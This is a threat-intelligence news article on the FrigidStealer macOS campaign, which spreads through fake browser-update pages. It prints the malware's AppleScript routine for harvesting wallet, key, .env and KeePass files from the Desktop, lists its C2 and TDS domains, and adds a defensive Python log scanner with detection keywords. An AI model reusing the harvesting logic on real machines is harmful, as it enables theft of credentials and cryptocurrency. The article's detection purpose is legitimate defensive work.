Security researchers at Proofpoint have uncovered a sophisticated web inject campaign targeting macOS users with a new information-stealing malware called FrigidStealer.
The operation involves two newly identified threat actors, TA2726 and TA2727, collaborating to compromise legitimate websites and redirect victims to fake browser update pages.
This marks a significant escalation in attacks against macOS devices, which have traditionally faced fewer threats than Windows systems.
The attack chain begins when TA2726, a traffic distribution service (TDS) operator, injects malicious JavaScript into compromised websites.
This script redirects visitors based on geographic location and device type. North American users are funneled to TA569’s SocGholish malware, while European and Asian traffic is directed to TA2727’s payload delivery system.
For Mac users, researchers at Proofpoint noted that this results in a tailored attack: Safari or Chrome users see forged update prompts that download FrigidStealer via weaponized DMG files.
Breakdown of FrigidStealer’s Execution
The malware employs advanced social engineering tactics, using WailsIO frameworks to render browser-like interfaces that mimic legitimate installers.
Victims receive instructions to right-click and “Open” the malicious application, bypassing macOS Gatekeeper protections. Upon execution, FrigidStealer leverages AppleScript to harvest critical data:
    -- Extensions the stealer looks for: documents, crypto wallets, key material,
    -- .env secrets and KeePass databases (.kdbx)
    set extensionsList to {"txt", "docx", "rtf", "doc", "wallet", "keys", "key", "env", "md", "kdbx"}
    try
        -- Enumerate everything on the user's Desktop
        set desktopFiles to every file of desktop
        repeat with aFile in desktopFiles
            try
                set fileExtension to name extension of aFile
                if fileExtension is in extensionsList then
                    set fileSize to size of aFile
                    -- Only small files (under 50 KB) are taken, keeping exfiltration quiet
                    if fileSize < 51200 then
                        -- fileGrabberFolderPath is the staging folder set elsewhere in the malware (not shown)
                        duplicate aFile to folder fileGrabberFolderPath with replacing
                        delay 1
                    end if
                end if
            end try
        end repeat
    end try
Code snippet showing FrigidStealer’s logic for stealing cryptocurrency keys and documents.
The malware exfiltrates Safari/Chrome cookies, Apple Notes databases, and files with extensions associated with passwords (.wallet, .kdbx) to the C2 domain askforupdate[.]org.
TA2727 coordinates payload delivery through domains like deski[.]fastcloudcdn[.]com, which serve geographically filtered scripts to Windows, Android, and Mac users.
Security teams should prioritize detecting traffic to TA2726’s TDS infrastructure (blackshelter[.]org, rednosehorse[.]com) and monitor for suspicious AppleScript activity.
Proofpoint’s Emerging Threats ruleset now includes signatures to block these domains, while endpoint solutions must scrutinize ad-hoc signed binaries claiming to be browser updaters.
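The two detection steps recommended above can be prototyped with a short script. The following is an added example written for this article, not code from Proofpoint or from the Emerging Threats ruleset: it refangs the four domains named in the article, matches them (and their subdomains) against constructed proxy log lines, and flags inline osascript invocations whose arguments contain strings the FrigidStealer AppleScript fragment depends on. The log formats and the keyword heuristic are assumptions.

```python
"""
Added example for the FrigidStealer write-up (not Proofpoint's code).
Scans constructed proxy and process-audit log lines for the article's IoC
domains and for suspicious inline AppleScript execution via osascript.
"""
from typing import Optional

# Indicators exactly as published in the article, in defanged form.
DEFANGED_IOCS = [
    "askforupdate[.]org",          # FrigidStealer C2
    "deski[.]fastcloudcdn[.]com",  # TA2727 payload delivery
    "blackshelter[.]org",          # TA2726 TDS
    "rednosehorse[.]com",          # TA2726 TDS
]


def refang(indicator: str) -> str:
    """Turn a defanged indicator such as 'example[.]org' back into a hostname."""
    return indicator.replace("[.]", ".").lower()


IOC_DOMAINS = {refang(d) for d in DEFANGED_IOCS}


def domain_matches(host: str) -> Optional[str]:
    """Return the matching indicator if host equals an IoC or is a subdomain of one."""
    host = host.lower().rstrip(".")
    for ioc in IOC_DOMAINS:
        if host == ioc or host.endswith("." + ioc):
            return ioc
    return None


# Constructed sample logs (assumed formats):
#   proxy:   "<timestamp> <src_ip> <dst_host> <method>"
#   process: "<timestamp> <user> <process> <args>"
PROXY_LOG = """\
2025-02-18T10:01:02Z 10.0.0.12 cdn.example.com GET
2025-02-18T10:01:05Z 10.0.0.12 deski.fastcloudcdn.com GET
2025-02-18T10:02:17Z 10.0.0.33 www.rednosehorse.com GET
2025-02-18T10:03:40Z 10.0.0.12 askforupdate.org POST
"""

PROCESS_LOG = """\
2025-02-18T10:03:41Z alice osascript -e 'tell application "Finder" to duplicate every file of desktop'
2025-02-18T10:04:00Z alice osascript /Users/alice/scripts/backup.scpt
2025-02-18T10:05:10Z bob /Applications/Safari.app/Contents/MacOS/Safari
"""

# Strings the article's AppleScript fragment relies on. Seeing any of them in an
# inline (-e) osascript command is a heuristic worth triaging, not proof of compromise.
APPLESCRIPT_KEYWORDS = ("name extension", "duplicate", "every file of desktop", "kdbx", "wallet")


def scan_proxy(log: str) -> list:
    """Return one dict per proxy line whose destination host matches an IoC."""
    hits = []
    for line in log.splitlines():
        parts = line.split()
        if len(parts) < 4:
            continue
        ts, src, host, method = parts[:4]
        ioc = domain_matches(host)
        if ioc:
            hits.append({"ts": ts, "src": src, "host": host, "ioc": ioc, "method": method})
    return hits


def scan_processes(log: str) -> list:
    """Return one dict per inline osascript command containing stealer-like keywords."""
    hits = []
    for line in log.splitlines():
        parts = line.split(maxsplit=3)
        if len(parts) < 4:
            continue
        ts, user, proc, args = parts
        if proc != "osascript" or "-e" not in args.split():
            continue
        lowered = args.lower()
        matched = [k for k in APPLESCRIPT_KEYWORDS if k in lowered]
        if matched:
            hits.append({"ts": ts, "user": user, "keywords": matched})
    return hits


if __name__ == "__main__":
    for hit in scan_proxy(PROXY_LOG):
        print("IoC traffic:", hit)
    for hit in scan_processes(PROCESS_LOG):
        print("Suspicious AppleScript:", hit)
```

Matching on the suffix rather than on an exact string is what catches the `www.` host in the sample; in production the domain list would be loaded from the threat feed rather than hard-coded, and the osascript rule would be tuned against the organisation's own baseline of legitimate automation.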
As organizations harden email defenses, threat actors increasingly exploit compromised websites and abused CDNs to bypass traditional security perimeters.
Regular patching, user education about fake updates, and restricting unsigned application executions remain critical defenses against these evolving threats.